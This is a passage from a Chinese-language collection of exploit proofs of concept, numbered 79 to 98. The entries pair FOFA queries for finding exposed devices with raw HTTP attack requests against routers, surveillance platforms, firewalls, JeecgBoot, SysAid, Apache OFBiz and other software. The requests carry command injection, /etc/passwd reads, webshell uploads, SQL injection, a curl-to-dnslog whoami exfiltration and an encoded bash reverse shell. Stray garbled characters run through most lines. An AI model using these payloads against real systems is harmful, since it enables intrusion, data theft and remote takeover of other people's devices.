" G9 l% l% |# `7 c9 y& E. } p5 t" e3 C1 N
1 H1 P( m$ p+ q- v* V2 ~2 E) r
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1% Z1 K- f% S, d5 B6 L
Host: x.x.x.x
2 U' ~1 @' q6 x/ _* A: w3 s# ^. \* w* q I0 q. J, ]) B( d5 a2 |
! a8 }$ p& l: v% \+ Q! m6 I( q79. BYTEVALUE 百为流控路由器远程命令执行
8 w& P: s# z) p: HFOFA:BYTEVALUE 智能流控路由器: s2 F6 X( r( j u% y, f: t8 J" `
GET /goform/webRead/open/?path=|id HTTP/1.1& c; s4 I9 E/ D
Host:IP8 ]# `* F) D; O1 F# J; M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0% ~4 ?! q, K H1 W2 J' U+ @) j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.88 _* c. K/ r! P% u
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 b* U% E( S/ ~/ `2 k- |Accept-Encoding: gzip, deflate
3 p2 A$ x/ E8 C! UConnection: close [; h# I2 w& ?2 w! t
Upgrade-Insecure-Requests: 1. E w! T# e: F$ Q/ M( v
" q8 ?( R, b0 {3 V
5 g: ` t4 {, [80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传) E$ j; U5 i4 B
FOFA:app="速达软件-公司产品"
1 O4 \2 Y( H" m# _0 @* L2 NPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
8 K. ]6 q1 _- hHost: x.x.x.x
) v. I5 C( N6 ~* _1 M3 RUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 m/ B7 U. ]9 X$ s7 i) x( ?! m5 _
Content-Length: 27
% T y' m" Q) i- A* B, @$ I: G+ RAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
3 ^( v$ w) g% d; N# c( v. FAccept-Encoding: gzip, deflate9 R# b. ]3 E' ~6 h# p7 b
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
3 q: H1 f+ e' h) C- [Connection: close* ?9 ~2 g- {$ L6 F+ Z; H/ P2 t/ M
Content-Type: application/octet-stream
! r+ T. E P+ ^4 K0 CUpgrade-Insecure-Requests: 1
( x" T# S+ S1 e7 N# L) t W$ J) Z0 i
<% out.print("oessqeonylzaf");%>
. ~6 j) H% D7 s8 v" f; s
3 K9 F y7 w+ _, M/ F, j3 g' V; b. g; L% r: w) ]
GET /xykqmfxpoas.jsp HTTP/1.1/ u2 Y7 u, D$ x* B* e, }5 c
Host: x.x.x.x
( P- f4 E8 }2 K- g6 m: k( OUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
& }+ s( ]' f/ T$ n% NConnection: close$ O9 e1 m0 p" \0 q$ @6 E/ _( H3 U
Accept-Encoding: gzip0 Q. R p/ i" `* T* F
5 D7 D9 q* t- F
8 `4 L% u" F" m2 q0 L( F81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
4 [" _! x- `7 ^0 R% h# aFOFA:app="uniview-视频监控"7 p1 }1 ]9 v4 ]8 {& Z; ^
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
6 b5 e' H6 e+ F% ]( Q" D, ~8 l) K, ZHost: x.x.x.x0 C$ F* h/ t2 K$ W3 F. P$ a, E. T
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15% k; o+ f+ M5 }& h3 b
Connection: close1 {6 F' z% ~$ S7 X
Accept-Encoding: gzip7 q( S5 f! r, l+ z
: a4 X- C9 T5 k+ K5 \
( z- l0 x M1 |* M" C8 ^& w
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
& _' \3 w4 O6 y; w8 K, ^# I( T dFOFA:app="思福迪-LOGBASE" G J- B# Z8 s1 X9 O. H [
POST /bhost/test_qrcode_b HTTP/1.1
" S7 A+ T7 S7 I6 k# [4 J) rHost: BaseURL$ D' z4 C9 j2 Z' @
User-Agent: Go-http-client/1.1
( c; h9 [8 \5 ~& z6 M% g) |) eContent-Length: 23
" f4 B N4 B+ N$ A% jAccept-Encoding: gzip
% q) ], t, _ t+ a; e& rConnection: close2 _/ R% d6 P/ Q, j0 Q
Content-Type: application/x-www-form-urlencoded
4 {- h5 a3 r! K [1 U1 BReferer: BaseURL9 m( P: e% j, N( x4 O0 Z
@% f$ w6 I; Y) K+ R; L9 M$ _
z1=1&z2="|id;"&z3=bhost
* m- W6 A; j6 p
7 l6 e. j, u: D6 E4 I) q6 y2 J7 H% i4 {( x! @/ A* @! i
83. JeecgBoot testConnection 远程命令执行
6 x# U, b9 h g6 G& KFOFA:title=="JeecgBoot 企业级低代码平台"1 z3 H# A/ b( ?
& F' O: p9 @1 P7 g! x, x, B' D. p5 @+ s. e0 O L# U" M
POST /jmreport/testConnection HTTP/1.1
: B2 g1 @0 e' z& b- NHost: x.x.x.x
, S3 [8 Y9 g6 DUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
8 k9 e. O" T2 _- x8 f" ], B, s2 {5 [$ TConnection: close, P! v4 }# y. D( K& m
Content-Length: 8881
9 |' I* {8 z, \: u+ bAccept-Encoding: gzip: Z6 i; P2 F$ n, ^ j) e
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO": q/ Z3 r* N! x: ?( W: {; P
Content-Type: application/json3 ?/ B& s1 W2 `) I; S& G/ |
2 u. @& R: A! X6 P4 z* y. C. BPAYLOAD
: Y0 i- h s/ G
+ g4 Y% {, j% `5 P3 ^1 i) ^84. Jeecg-Boot JimuReport queryFieldBySql 模板注入0 m% N" A% C8 i/ E o. [- ~
FOFA:title=="JeecgBoot 企业级低代码平台"
: O- G2 ^- A* o- d; k; D" }
- x+ X$ w5 r {/ T/ N; L' O: V+ n* j: w d3 o$ T
. e; c" C8 Q1 z4 j
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1( Q* g$ `# u8 c
Host: 192.168.40.130:8080
) B9 ?5 L d4 y' H& X( y( yUser-Agent: curl/7.88.1
" g9 p: f, P2 f- {2 ]9 QContent-Length: 156
K) [; O) A3 v2 X9 [3 wAccept: */*1 e0 X8 n9 O: r5 y/ e0 r/ q
Connection: close
8 f6 [6 I. R+ _Content-Type: application/json
) U) Z; ?6 n, N. F% e$ x* TAccept-Encoding: gzip3 N* t" \: k" I4 N8 d8 q
" ]! p% B( i+ i; T; L7 N
{' F0 v+ s, ~3 a
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
: w7 H) e0 F, G. P/ t. A6 `& L N) u "type": "0"
9 h0 l, q! M0 y, Q1 g}
# ]( `" c6 @8 T+ @4 J
) K, l! c7 g4 | d( K) m, A
( r! J/ A. B E1 |85. SysAid On-premise< 23.3.36远程代码执行
0 L$ W/ m. g7 qCVE-2023-472468 i D* K+ h: {3 z N' `
FOFA:body="sysaid-logo-dark-green.png"
/ e( K: p) n7 L! `! |4 OEXP数据包如下,注入哥斯拉马" a% ` T9 X4 \: F% R. P, ~7 q
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
! G7 f8 g- L& E; j! FHost: x.x.x.x
+ h( |$ X# ` Q2 T9 F$ YUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 ?/ Y3 K6 P3 o6 z( H! CContent-Type: application/octet-stream& I2 X1 O( Q! I5 y8 P
Accept-Encoding: gzip
3 Y: C& [, P1 X H: A. J8 P
$ M6 e, s) H/ xPAYLOAD3 y7 l' x* \$ V4 w x% C1 Y
7 E' n) o& h: D. M, n/ O1 v回显URL:http://x.x.x.x/userfiles/index.jsp. b! X8 F# J6 A9 x/ S! ]! {2 L
3 `8 w/ N3 J/ l( v
86. 日本tosei自助洗衣机RCE
/ ~: U% b f# D( ~& P" IFOFA:body="tosei_login_check.php"; _* Y0 y* E+ k! _, _1 m
POST /cgi-bin/network_test.php HTTP/1.1
( w% H) i5 g- a8 |Host: x.x.x.x+ c1 |$ K& \3 F* |, j
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36# S& ?" N' V$ o2 l
Connection: close
8 \5 G! y2 B' k7 m; PContent-Length: 442 V+ ]- d* X2 S% b. D( }- J& z! u
Accept: */*2 L- [2 D! l. Z/ m7 @; }+ ~5 P: o
Accept-Encoding: gzip
3 D: [: V: G Z6 p! s2 z. {Accept-Language: en& P9 G- w9 k' G( {, E f
Content-Type: application/x-www-form-urlencoded- g. m+ a( l1 d( U
0 b7 G9 m' G: @) [3 nhost=%0acat${IFS}/etc/passwd%0a&command=ping
2 ~) |4 L+ _0 Y: ]( ^1 U, U2 d1 H* _ A" M( \
* f' ]! y. y# s, J/ w" ]87. 安恒明御安全网关aaa_local_web_preview文件上传3 c) x7 s" \1 N$ [0 h F! r8 V
FOFA:title="明御安全网关"8 \9 Q/ f$ b. b& x! O
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
% [) e1 }$ }+ y& Y/ X3 w0 eHost: X.X.X.X O8 W! i- R& w7 u
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
: b6 c; B( d# g4 P. j. |5 X% gConnection: close5 G- s2 ~0 D2 X! T3 t& B
Content-Length: 198
* m5 W3 J( h: ^# EAccept-Encoding: gzip
4 j& q- z- j+ S/ b0 L$ @3 O/ [Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd% d/ E4 @* W$ y( \, m2 k l* y
6 O" b& K2 O6 D) o; R% n$ t* N
--qqobiandqgawlxodfiisporjwravxtvd
/ f- q; C, M$ T- q+ BContent-Disposition: form-data; name="123"; filename="9B9Ccd.php"
7 r! N) w& M4 A sContent-Type: text/plain* N+ M5 W/ I/ u5 l7 V
+ A4 p$ g$ x, z- O. }
2ZqGNnsjzzU2GBBPyd8AIA7QlDq- H; h2 @6 Q6 W; A$ R- q) C: b
--qqobiandqgawlxodfiisporjwravxtvd--! _/ w% f. V. V
c. `4 t, n0 }5 u
: r3 f. |7 n1 q R; E4 j" z/jfhatuwe.php
, G/ Q7 o' G3 J9 V: z% c) {* _; Z, j6 r" E4 O
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行& a& G6 J- v/ a; _7 Q: P* k
FOFA:title="明御安全网关"
' ^2 A, m, R' s; ]% e' a tGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
% V- G" Q4 ~ P5 n* U8 S' XHost: x.x.x.xx.x.x.x( Q. g' N% J3 d& B0 q1 E
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
, q8 h1 a" {0 Z* A- n6 V2 e6 YAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8; a* E8 E7 m8 v/ p5 p! y
Accept-Encoding: gzip, deflate7 L' m, F# |+ y& q' q/ N0 b, n- C
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 B/ a( A% C! I& X5 I& EConnection: close& w! ?) x. a+ f. s. l% v& L8 }2 O: V
7 X+ s& J. n# e' ]/ n i
9 T( J9 y& \) {/astdfkhl.php
' D* Y. ~' i( [- X! T' k7 I- f' X4 q, N0 L1 `
89. 致远互联FE协作办公平台editflow_manager存在sql注入$ b' d4 [% `' @
FOFA:title="FE协作办公平台" || body="li_plugins_download"
7 n8 @8 d' K) K" f7 gPOST /sysform/003/editflow_manager.js%70 HTTP/1.1# Y5 U; {' x! G- W/ k2 l
Host: x.x.x.x
/ `6 F. V, ^& v# }! GUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
* P) d a; C# \! {$ A1 H" e. t" yConnection: close
* [" R6 Q, g0 d0 u! d: }Content-Length: 41
+ B1 F) [8 |( T0 Q o4 xContent-Type: application/x-www-form-urlencoded- G3 L" q" b g+ X- B. [
Accept-Encoding: gzip
! b3 G: M1 Z& L6 k0 @( x3 E- E3 M% H. p/ M/ e, {
option=2&GUID=-1'+union+select+111*222--+
8 T8 _+ d$ G( r6 g n" V1 }; U3 T* r
& `1 b' R" r( s& x! O; q N% d
) D, T$ X5 I) q+ v1 K$ z6 V3 i) Z3 z) @90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行, p1 y W& j" w6 [. ^; y$ S
FOFA:icon_hash="-1830859634"
5 G& y' n5 J2 {& KPOST /php/ping.php HTTP/1.1" A* k/ m Q0 y7 X! x& }. X# j9 o
Host: x.x.x.x7 n1 X+ ~, S1 R3 X1 u" s: d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
! B# ^* a% ?" E: t3 R' uContent-Length: 51/ `& q. H/ K- m0 @4 a4 F
Accept: application/json, text/javascript, */*; q=0.01
: a6 Z! `5 F: N" vAccept-Encoding: gzip, deflate
: [2 q0 L. w6 A- M9 Y4 H6 AAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 O7 R& T3 c: M, pConnection: close8 g, }7 l4 |+ q1 N, d
Content-Type: application/x-www-form-urlencoded
* _1 `; j d4 O4 LX-Requested-With: XMLHttpRequest
. S+ G% ]! P+ y% J6 k2 r/ h/ f
Q9 s8 h0 \* g' I- A. Kjsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
( f n7 y9 _, l$ p8 {- I% b6 t# j
3 ?2 J) m4 V$ q0 y Z; o- g( |7 H
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取3 ~1 W) x, r8 o- _& _
FOFA:title="综合安防管理平台", t2 r. m* s; b F% S
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
, C: R6 R3 h1 tHost: your-ip5 g" s" E# O% F- U6 e6 b, \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
& p) U. K _6 ~4 XAccept-Encoding: gzip, deflate0 \6 f) e3 a% q" L* i
Accept: */*
3 \" h* h! J1 {9 k8 G! {% CConnection: keep-alive
1 P8 h- v* ]5 Z1 l& K: D% d0 b9 }0 n' s7 D! K' x, Y
* c3 G- e" R3 ]: E# L+ D8 g
7 u7 }" I) [1 e# c6 N, e% N
92. 海康威视运行管理中心session命令执行8 i/ O6 E' u! M& V4 [) M
Fastjson命令执行
5 w5 O8 _0 G. O- }- v* ?4 Ihunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"( S2 o2 @8 y' ]0 H3 P: G k1 N
POST /center/api/session HTTP/1.1
( W+ T& u* q. U1 ? C$ z: ~2 j( xHost:
! F0 q+ K" } B8 k$ G" U5 Y. CAccept: application/json, text/plain, */*
& K' p$ r& X4 B$ iAccept-Encoding: gzip, deflate
6 |- D. D+ Z7 v3 Y1 DX-Requested-With: XMLHttpRequest
( b; H9 N; o# D# b8 a8 kContent-Type: application/json;charset=UTF-8
# U8 N7 n7 i0 L9 ^7 q- v/ nX-Language-Type: zh_CN0 C% _5 l6 N. g! f
Testcmd: echo test; ~, r: U8 l- L7 S
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
; J7 I4 s1 [. _Accept-Language: zh-CN,zh;q=0.90 f/ K3 B- a; t8 @
Content-Length: 57786 ?6 i! K$ u. O1 c f& i
|! G$ ~* T4 h' \ D2 F5 U4 f
PAYLOAD
' @4 a; X. f( C5 A! f5 q) H5 P2 q7 d C k* {2 Q
* P6 } o" J% W* a4 c' z a93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传2 R6 O* l: g2 N6 E
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
2 ]- m) ]; G* a8 D9 nPOST /?g=app_av_import_save HTTP/1.1- u/ ~; n8 E: L7 o* Q" r9 ]
Host: x.x.x.x
! p; B- X! E- d( }* F }3 qContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
0 @+ Y8 D" q1 _) UUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
! i" X! e' K: s5 s% K6 m! y
- e4 U5 p; N; f) [: ?1 d, }* G( _------WebKitFormBoundarykcbkgdfx1 f" u% Z3 N0 N+ B
Content-Disposition: form-data; name="MAX_FILE_SIZE"
' A: W8 B H4 ]6 |+ x4 b% [! t' o. Z1 Q3 R3 _9 z( E
10000000! z' A) g( a0 x5 r/ q3 m/ Q: [! p
------WebKitFormBoundarykcbkgdfx) D: t% g" d- q1 O9 R x
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
& ^) T: H5 U! w+ n9 l% ^Content-Type: text/plain
5 c( Z- @6 O1 P1 N* P2 M, Y! q3 L1 e0 U! b& O
wagletqrkwrddkthtulxsqrphulnknxa
8 H' r) Y( F- z! n2 K# Y0 C9 q------WebKitFormBoundarykcbkgdfx0 m- r6 q* A1 r; Q
Content-Disposition: form-data; name="submit_post"5 d9 V, P j, {
9 e# R1 \% d7 c! z& o0 e
obj_app_upfile
) H1 C* ^3 h( [( ]2 s9 ^------WebKitFormBoundarykcbkgdfx4 @6 s3 n5 Y: V0 m& l
Content-Disposition: form-data; name="__hash__". @ s/ z' W" O- c# O* F# M" i
/ w. ]* w; E3 m" c
0b9d6b1ab7479ab69d9f71b05e0e94454 i2 f) \; Q& \! `: [
------WebKitFormBoundarykcbkgdfx--
. V, C1 h4 x; Z; E [: U. X
- M1 W0 F* g* ~& w' R. `
% J) H6 N2 y3 }( ?/ u4 BGET /attachements/xlskxknxa.txt HTTP/1.19 P) N0 a1 I* ~: L
Host: xx.xx.xx.xx
! `* y7 W K$ E+ T9 J' F. a7 ]User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36; F" I& H! q: W! L- _+ v- O5 a! l/ G
* S8 C4 |" Z/ _: [1 H0 q
) F# _8 k" R. |$ I
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
1 R' z2 p3 P9 J: }% [" L, [* TFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
V% n5 L* e& @9 OPOST /?g=obj_area_import_save HTTP/1.1) B0 @ h3 m! H2 J" G4 C5 j. l
Host: x.x.x.x( S4 r ~4 ~+ P6 e
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt) z! d! d5 J2 Q" a$ b- w, j! A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
r! X# D6 n! j& ]/ p6 }: ^# G0 e3 h6 n: A% _6 w/ ]
------WebKitFormBoundarybqvzqvmt8 f" Q/ Q! E; a4 l" H8 ~% [
Content-Disposition: form-data; name="MAX_FILE_SIZE"; M) j( E: A1 v) q0 d! Y9 |
: c# b+ [# C+ G; U
10000000
" q$ c* {. Y% x- j; }( @8 }+ B8 a' C------WebKitFormBoundarybqvzqvmt
; U4 c0 ?: {+ {& f/ MContent-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"4 h. B" l' h$ k
Content-Type: text/plain0 S1 ]! i `* S; J9 D# q4 N, D
9 D L8 D5 O$ G, s7 _! Z- q
pxplitttsrjnyoafavcajwkvhxindhmu m/ R0 j6 Q0 |; _1 f
------WebKitFormBoundarybqvzqvmt
2 y- l/ Z# ]0 ]6 _0 y! aContent-Disposition: form-data; name="submit_post": _# |1 r% L: W( d" v
1 a6 x5 Y: W# s. R7 W# v `3 _obj_app_upfile) d0 [% x0 {/ z' k3 m1 N) f
------WebKitFormBoundarybqvzqvmt4 i3 T8 Y' w& q" o
Content-Disposition: form-data; name="__hash__"# A6 n6 j. `0 }
1 g0 H; U, \$ t; E; }' f
0b9d6b1ab7479ab69d9f71b05e0e9445
$ m1 f3 z! u. V# c/ _------WebKitFormBoundarybqvzqvmt--
2 [( s) ^7 b& K7 X& |$ [
% Z4 O; p4 c F9 P5 W
6 {: Y, K5 G7 O0 R$ s" Q% C! ]2 Q' |
GET /attachements/xlskxknxa.txt HTTP/1.1
/ Y& ~% w- N8 |, @Host: xx.xx.xx.xx! F+ k- ^. Q0 Q8 O, V( n
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
, r C [8 X. Q
+ T- S, E: t3 ? a, N8 c2 |
+ y) Y/ F4 E3 J# Q) p2 ~1 B; q5 q7 G' p
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
" A% }6 g V; S" y2 Y" }: hCVE-2023-49070
5 w+ {' g4 w: b. nFOFA:app="Apache_OFBiz"
% m9 S, o6 i6 v9 _" x( C8 y, ^8 ~POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
, ^+ O6 T- n( \9 V+ f, w7 |- I! L1 }Host: x.x.x.x8 v7 B2 C7 C* n- |; P* R4 n
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
! Y; c) C* |6 L2 tConnection: close7 R) c) o$ z: A
Content-Length: 889
- ~& U/ t5 U( AContent-Type: application/xml/ r( q% W# j6 J% j
Accept-Encoding: gzip
, l K- [' d, W/ z7 T/ T
* E1 P% c* m8 { C<?xml version="1.0"?>
c$ K) ]# R# u# C2 [( A<methodCall>
9 Q; B* ?8 W6 \ K3 M/ q <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
% X. a# E; @ }1 D! u8 N <params>
% c$ |0 P# m G7 S' E <param>* {, z1 d; ^' B: G8 M
<value>
- f& T& F0 g5 v+ w+ Z# D% Y <struct>% n. s1 y) B8 j% D' g& K' L2 M
<member>
( l0 v9 d; Z8 E7 L9 F$ ?. n <name>test</name>1 [* `5 q( v u0 \1 }
<value>4 Z# _0 z% V$ z4 {$ n9 M3 I
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>3 m# b8 j; k% h* F9 G( Z" x& L" w4 f
</value>5 U | G2 V, v" {1 p
</member>2 i1 I8 \# J$ ~! G4 d! h
</struct>
: q3 U) z: j9 w" F! I, k </value>5 D% M* \+ Q8 K9 z2 e
</param>
0 g# Q- J# I/ S% e </params>' }9 Z3 t( {+ E8 {6 }
</methodCall>
0 Z, {' U' C0 |$ q ?, a$ ?2 ?
2 q0 ~3 ]9 @( p! s" k( [9 g/ y; V @3 \+ C# X; o
用ysoserial生成payload
7 x6 Y/ n, j2 R0 r4 p6 sjava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
+ g' c1 \6 j/ b( \8 N- {
' G. ]4 \$ I: u7 L, S. i
J8 r& ~9 @; X7 g1 K将生成的payload替换到上面的POC
$ p9 x+ G6 K! v0 YPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.15 e& @+ k$ D" {- C
Host: 192.168.40.130:84430 C. J) Q9 `. l7 A8 i
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.367 S- S e% R0 d& L5 U F2 v
Connection: close
# F$ z z2 y- ~# y( J5 t; V- F4 jContent-Length: 8898 V3 k$ Z7 X' M, I5 D
Content-Type: application/xml. N4 |3 u9 ~; E" G, ?0 v
Accept-Encoding: gzip( W. T$ h& m; F0 r' g
; a: ?; s; d# Q, v% f' Y4 v
PAYLOAD
, _! k4 Q; Q9 ?% q7 Z- V* e ^6 C# [8 l! _9 `
96. Apache OFBiz 18.12.11 groovy 远程代码执行
9 @+ k5 B; c0 V, a0 y* J. qFOFA:app="Apache_OFBiz"/ u9 [: l- c0 r9 f
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
2 j: C/ }+ P p5 O. v" b$ aHost: localhost:8443
" X6 K8 _2 a, t4 T# DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0! z" s. E0 n3 z; B+ o, @
Accept: */*
$ H' [/ y/ E; X% D" vAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' y2 c( q3 m TContent-Type: application/x-www-form-urlencoded3 K' k F% h( s) m; ?& R& J% p
Content-Length: 55" e8 Q+ e0 P$ s
]3 Q6 f8 I# w4 G9 F8 v3 V$ xgroovyProgram=throw+new+Exception('id'.execute().text);4 B, ^- V5 @1 `; }6 o- b
" [1 p3 X P! i3 I' M" G$ }
% a, i" F/ o! L7 G/ ~' ~) d
反弹shell- R$ M3 j& [ W
在kali上启动一个监听6 Y* Y: z4 C8 g' j; h! Q: ^
nc -lvp 7777" Y; g. c5 q4 e; p
5 P( v- U# f0 `* n' V WPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
! D6 q# L# O9 C& x' ?% N: gHost: 192.168.40.130:8443
/ g1 |, l; ?) |& ?. iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
1 E' z/ P: d" _4 UAccept: */*
% |$ [; V' w$ `/ o% iAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ }, [8 O' n% n' C5 G3 [% \, l( A
Content-Type: application/x-www-form-urlencoded
r' y2 f8 A* I$ k! pContent-Length: 71
0 c* t3 s1 T. Z- l. }2 Z
( m3 v4 q# t3 QgroovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();7 \0 W: S) l6 q0 S/ R- f
4 A# L3 E A) ]# N; M! I
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
+ h1 Q5 [" S) {( ~- @0 S8 RFOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
' }0 @0 _- f i- W" w) pGET /passport/login/ HTTP/1.1# i; k6 H) x/ T2 P ^5 F1 @3 T
Host: 192.168.40.130:8085- v, N6 R! m) [' _' J; V
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
& w/ I; e) x/ S C! U1 eAccept-Encoding: gzip1 q+ {! j8 T4 r
Connection: close7 P- D5 a' \2 i( I3 d4 `1 C; U. Z
Cookie: rememberMe=PAYLOAD1 Y) e2 K. o+ f9 f1 B4 B2 {
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk", }9 s2 o/ s* ^5 k
) j# B' r! ^5 _0 E
) }/ K8 q8 t- I/ h( Y0 x98. SpiderFlow爬虫平台远程命令执行+ d2 Z* J5 G* _ w- O& V
CVE-2024-0195
( O2 H& g0 ]3 q+ bFOFA:app="SpiderFlow", M& p7 W/ o8 \* d& y4 c: y- K
POST /function/save HTTP/1.1# V) T" z1 j+ ~1 S
Host: 192.168.40.130:8088
e6 ^% }& L' i& a/ J2 h6 F: OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0% } }% l' Q$ g5 ]% f2 B" @( d
Connection: close' x }: Y/ ^- L
Content-Length: 121, j9 w8 n! m. s: `+ E
Accept: */*
$ P1 u/ }7 V3 T vAccept-Encoding: gzip, deflate/ b6 D- c! k- |
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 T- N# m+ I& H* D }, J' R+ z
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
